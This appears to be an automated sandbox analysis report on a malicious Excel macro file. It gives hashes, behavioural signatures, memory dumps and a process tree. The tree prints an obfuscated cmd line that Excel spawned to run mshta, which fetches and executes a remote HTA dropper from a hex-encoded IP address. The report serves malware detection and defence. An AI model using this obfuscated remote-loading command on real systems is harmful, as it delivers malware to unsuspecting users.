Analysis

  • max time kernel
    150s
  • max time network
    137s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    19-01-2022 22:06

General

  • Target

    c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0.xlsm

  • Size

    115KB

  • MD5

    383a3c7cdb5a9070656164e0b90e41a5

  • SHA1

    af0b4eedbd1c6d85705c26ebb3955f8b35a8cea8

  • SHA256

    c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0

  • SHA512

    c37692e7c9a60fcda701450a620f09c0c95db6e6a1ee3188c2897d09a621d80e3f0fb539506f458ab5c20a7e5adc8adfbe2bcad0860c4bb9484f6292eb391b9c

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/se1.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3084
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2180
        • C:\Windows\system32\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          PID:2988

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2744-115-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp

      Filesize

      64KB

    • memory/2744-116-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp

      Filesize

      64KB

    • memory/2744-117-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp

      Filesize

      64KB

    • memory/2744-118-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp

      Filesize

      64KB

    • memory/2744-121-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp

      Filesize

      64KB

    • memory/2744-128-0x00007FF9D3640000-0x00007FF9D3650000-memory.dmp

      Filesize

      64KB

    • memory/2744-129-0x00007FF9D3640000-0x00007FF9D3650000-memory.dmp

      Filesize

      64KB